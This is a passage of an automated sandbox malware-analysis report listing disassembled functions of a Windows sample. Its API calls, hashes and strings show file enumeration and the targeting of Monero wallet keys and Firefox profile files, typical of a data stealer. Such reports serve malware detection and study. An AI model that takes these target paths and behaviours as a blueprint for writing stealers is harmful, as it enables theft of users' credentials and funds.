                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$File$CloseFirstNextwsprintf
                  • String ID: %s\%s$%s\%s$%s\*
                  • API String ID: 180737720-445461498
                  • Opcode ID: 39bc94051a589f195f84e3358a745991a701a1553609ce112febf1999d155a42
                  • Instruction ID: 0468e981c52c37ccb9a17ef17d6202a2c737295782a5562063ca15c6f75f0d55
                  • Opcode Fuzzy Hash: 39bc94051a589f195f84e3358a745991a701a1553609ce112febf1999d155a42
                  • Instruction Fuzzy Hash: C86176B5950218ABCB24EFA4DC45EEA73BCFB59700F4045C8B60D96181EB30EB85CFA1
                  Function 00B14570 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00B14580
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00B14587
                  • wsprintfA.USER32 ref: 00B145A6
                  • FindFirstFileA.KERNEL32(?,?), ref: 00B145BD
                  • StrCmpCA.SHLWAPI(?,00B20FC4), ref: 00B145EB
                  • StrCmpCA.SHLWAPI(?,00B20FC8), ref: 00B14601
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00B1468B
                  • FindClose.KERNEL32(000000FF), ref: 00B146A0
                  • lstrcat.KERNEL32(?,011FE280), ref: 00B146C5
                  • lstrcat.KERNEL32(?,011FD758), ref: 00B146D8
                  • lstrlen.KERNEL32(?), ref: 00B146E5
                  • lstrlen.KERNEL32(?), ref: 00B146F6
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                  • String ID: %s\%s$%s\*
                  • API String ID: 671575355-2848263008
                  • Opcode ID: ce37dcb1815f02f88dfead1b77c9fbbefa0161319a774ef6b1ae89a660b47c1d
                  • Instruction ID: cf1d8d467243a13bda1c1d05405bfe1fcfdeec24dfc0818d9b32a1c986660717
                  • Opcode Fuzzy Hash: ce37dcb1815f02f88dfead1b77c9fbbefa0161319a774ef6b1ae89a660b47c1d
                  • Instruction Fuzzy Hash: A05145B69502189BC724EF74DC89FED77BCEB58300F4045C8B609D6190EB749B858FA1
                  Function 00B13EA0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON
                  Download Yara Rule
                  APIs
                  • wsprintfA.USER32 ref: 00B13EC3
                  • FindFirstFileA.KERNEL32(?,?), ref: 00B13EDA
                  • StrCmpCA.SHLWAPI(?,00B20FAC), ref: 00B13F08
                  • StrCmpCA.SHLWAPI(?,00B20FB0), ref: 00B13F1E
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00B1406C
                  • FindClose.KERNEL32(000000FF), ref: 00B14081
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$File$CloseFirstNextwsprintf
                  • String ID: %s\%s
                  • API String ID: 180737720-4073750446
                  • Opcode ID: 5f932432ea01ccd81a03e9be74ab15d7f09ce62fe0cf660049b0f86c77532029
                  • Instruction ID: 75634d13bf0c0c098f663105aedec213371cb871564d903fece96c3ba98db20c
                  • Opcode Fuzzy Hash: 5f932432ea01ccd81a03e9be74ab15d7f09ce62fe0cf660049b0f86c77532029
                  • Instruction Fuzzy Hash: 84516AB6940318ABCB24EFB4DC85EE973BCFB58700F4045C8B65996180EB75DB858FA1
                  Function 00B0ED20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON
                  Download Yara Rule
                  APIs
                  • wsprintfA.USER32 ref: 00B0ED3E
                  • FindFirstFileA.KERNEL32(?,?), ref: 00B0ED55
                  • StrCmpCA.SHLWAPI(?,00B21538), ref: 00B0EDAB
                  • StrCmpCA.SHLWAPI(?,00B2153C), ref: 00B0EDC1
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00B0F2AE
                  • FindClose.KERNEL32(000000FF), ref: 00B0F2C3
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$File$CloseFirstNextwsprintf
                  • String ID: %s\*.*
                  • API String ID: 180737720-1013718255
                  • Opcode ID: aa6e449f39596b1e54afeaf01d44fc39a5c70f532fca58fbaaabaab40e9cd955
                  • Instruction ID: ba61bef43799b7a391bc4885784822da806172a8c74846516bc775a425260a9a
                  • Opcode Fuzzy Hash: aa6e449f39596b1e54afeaf01d44fc39a5c70f532fca58fbaaabaab40e9cd955
                  • Instruction Fuzzy Hash: F0E1F3719121189AEB55FB64DD52EEE73B8AF54310F8045E9B40A62092EF307FCACF52
                  Function 00B0F6B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00B1A740: lstrcpy.KERNEL32(00B20E17,00000000), ref: 00B1A788
                    • Part of subcall function 00B1A920: lstrcpy.KERNEL32(00000000,?), ref: 00B1A972
                    • Part of subcall function 00B1A920: lstrcat.KERNEL32(00000000), ref: 00B1A982
                    • Part of subcall function 00B1A9B0: lstrlen.KERNEL32(?,011F8B70,?,\Monero\wallet.keys,00B20E17), ref: 00B1A9C5
                    • Part of subcall function 00B1A9B0: lstrcpy.KERNEL32(00000000), ref: 00B1AA04
                    • Part of subcall function 00B1A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B1AA12
                    • Part of subcall function 00B1A8A0: lstrcpy.KERNEL32(?,00B20E17), ref: 00B1A905
                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00B215B8,00B20D96), ref: 00B0F71E
                  • StrCmpCA.SHLWAPI(?,00B215BC), ref: 00B0F76F
                  • StrCmpCA.SHLWAPI(?,00B215C0), ref: 00B0F785
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00B0FAB1
                  • FindClose.KERNEL32(000000FF), ref: 00B0FAC3
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                  • String ID: prefs.js
                  • API String ID: 3334442632-3783873740
                  • Opcode ID: 51128d814956b2e432475efaa4cc16a1f7c5058d045a6bcf00b8302b77a982c3
                  • Instruction ID: a3da772a5ca757a6790893d69deae9898ba0bb04a936a9ca5b9556a1ae1f94c5
                  • Opcode Fuzzy Hash: 51128d814956b2e432475efaa4cc16a1f7c5058d045a6bcf00b8302b77a982c3
                  • Instruction Fuzzy Hash: 41B175719012189BCB24FF64DD95EED77B9AF54310F8085E8E40A96191EF306B8ACF92
                  Function 00B016D0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00B1A740: lstrcpy.KERNEL32(00B20E17,00000000), ref: 00B1A788
                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00B2510C,?,?,?,00B251B4,?,?,00000000,?,00000000), ref: 00B01923
                  • StrCmpCA.SHLWAPI(?,00B2525C), ref: 00B01973
                  • StrCmpCA.SHLWAPI(?,00B25304), ref: 00B01989
                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00B01D40
                  • DeleteFileA.KERNEL32(00000000), ref: 00B01DCA
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00B01E20
                  • FindClose.KERNEL32(000000FF), ref: 00B01E32
                    • Part of subcall function 00B1A920: lstrcpy.KERNEL32(00000000,?), ref: 00B1A972
                    • Part of subcall function 00B1A920: lstrcat.KERNEL32(00000000), ref: 00B1A982
                    • Part of subcall function 00B1A9B0: lstrlen.KERNEL32(?,011F8B70,?,\Monero\wallet.keys,00B20E17), ref: 00B1A9C5
                    • Part of subcall function 00B1A9B0: lstrcpy.KERNEL32(00000000), ref: 00B1AA04
                    • Part of subcall function 00B1A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B1AA12
                    • Part of subcall function 00B1A8A0: lstrcpy.KERNEL32(?,00B20E17), ref: 00B1A905
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                  • String ID: \*.*
                  • API String ID: 1415058207-1173974218
                  • Opcode ID: 9cff878d3d490f92eb608244b6c99854baae0983a98e7fa5141bf9678bec5b18
                  • Instruction ID: e94b6e250e7e02af0130d210c17a765008f2d8780a03ec70a7b8a5110bbef6dc
                  • Opcode Fuzzy Hash: 9cff878d3d490f92eb608244b6c99854baae0983a98e7fa5141bf9678bec5b18
                  • Instruction Fuzzy Hash: 7812EC719111189BDB19FB60DD96EEE73B8AF54310F8045D9A10A66091EF307FCACFA1
                  Function 00B0DE10 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370fileCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00B1A740: lstrcpy.KERNEL32(00B20E17,00000000), ref: 00B1A788
                    • Part of subcall function 00B1A9B0: lstrlen.KERNEL32(?,011F8B70,?,\Monero\wallet.keys,00B20E17), ref: 00B1A9C5
                    • Part of subcall function 00B1A9B0: lstrcpy.KERNEL32(00000000), ref: 00B1AA04
                    • Part of subcall function 00B1A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B1AA12
                    • Part of subcall function 00B1A8A0: lstrcpy.KERNEL32(?,00B20E17), ref: 00B1A905
                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00B20C2E), ref: 00B0DE5E
                  • StrCmpCA.SHLWAPI(?,00B214C8), ref: 00B0DEAE
                  • StrCmpCA.SHLWAPI(?,00B214CC), ref: 00B0DEC4
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00B0E3E0
                  • FindClose.KERNEL32(000000FF), ref: 00B0E3F2
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                  • String ID: \*.*
                  • API String ID: 2325840235-1173974218
                  • Opcode ID: eb66167969ca100c3c3cfd3f03ee85de26dc3bcfdeaaa8eacae6b909e56f5bf2
                  • Instruction ID: 02f872215d60ffc17a38d4abadb12cfcf454c5bc781636a39136422df3ea6807
                  • Opcode Fuzzy Hash: eb66167969ca100c3c3cfd3f03ee85de26dc3bcfdeaaa8eacae6b909e56f5bf2
                  • Instruction Fuzzy Hash: 1DF18B718151189ADB29FB64DD96EEE73B8AF14310FC045D9A41A62091EF307FCACF62
                  Function 00B0DA80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00B1A740: lstrcpy.KERNEL32(00B20E17,00000000), ref: 00B1A788
                    • Part of subcall function 00B1A920: lstrcpy.KERNEL32(00000000,?), ref: 00B1A972
                    • Part of subcall function 00B1A920: lstrcat.KERNEL32(00000000), ref: 00B1A982
                    • Part of subcall function 00B1A9B0: lstrlen.KERNEL32(?,011F8B70,?,\Monero\wallet.keys,00B20E17), ref: 00B1A9C5
                    • Part of subcall function 00B1A9B0: lstrcpy.KERNEL32(00000000), ref: 00B1AA04
                    • Part of subcall function 00B1A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B1AA12
                    • Part of subcall function 00B1A8A0: lstrcpy.KERNEL32(?,00B20E17), ref: 00B1A905
                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00B214B0,00B20C2A), ref: 00B0DAEB
                  • StrCmpCA.SHLWAPI(?,00B214B4), ref: 00B0DB33
                  • StrCmpCA.SHLWAPI(?,00B214B8), ref: 00B0DB49
                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00B0DDCC
                  • FindClose.KERNEL32(000000FF), ref: 00B0DDDE
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                  • String ID:
                  • API String ID: 3334442632-0
                  • Opcode ID: 8819f8c7412ffffc19cbbdd3d7d107122d989483038088620330a7c1805abfd9
                  • Instruction ID: ba5a463fb597de914767572306b49218b0760b821ee2b6e5833de225ed7ca35b
                  • Opcode Fuzzy Hash: 8819f8c7412ffffc19cbbdd3d7d107122d989483038088620330a7c1805abfd9
                  • Instruction Fuzzy Hash: 9891487290010497CB14FFB4ED569ED77BDAF94310F4086E8F90A961D1EE34AB49CB92
                  Function 00B17B90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 00B1A740: lstrcpy.KERNEL32(00B20E17,00000000), ref: 00B1A788
                  • GetKeyboardLayoutList.USER32(00000000,00000000,00B205AF), ref: 00B17BE1
                  • LocalAlloc.KERNEL32(00000040,?), ref: 00B17BF9
                  • GetKeyboardLayoutList.USER32(?,00000000), ref: 00B17C0D
                  • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00B17C62
                  • LocalFree.KERNEL32(00000000), ref: 00B17D22
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                  • String ID: /
                  • API String ID: 3090951853-4001269591
                  • Opcode ID: f9e43291fbbe636edda4092dc7944a7e70a18082ab826bfc5855a2b7ac0a113b
                  • Instruction ID: f7c9efe6207144d6021c000b695acf2dab893beb14f6fa2758b33a65516a7bde
                  • Opcode Fuzzy Hash: f9e43291fbbe636edda4092dc7944a7e70a18082ab826bfc5855a2b7ac0a113b
                  • Instruction Fuzzy Hash: 61412C71941218ABDB24DF54DC99BEDB3B4FB44710F6041D9E009A2291DB342F86CFA1
                  Function 00EE24C9 Relevance: 10.4, Strings: 7, Instructions: 1624COMMON
                  Download Yara Rule
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
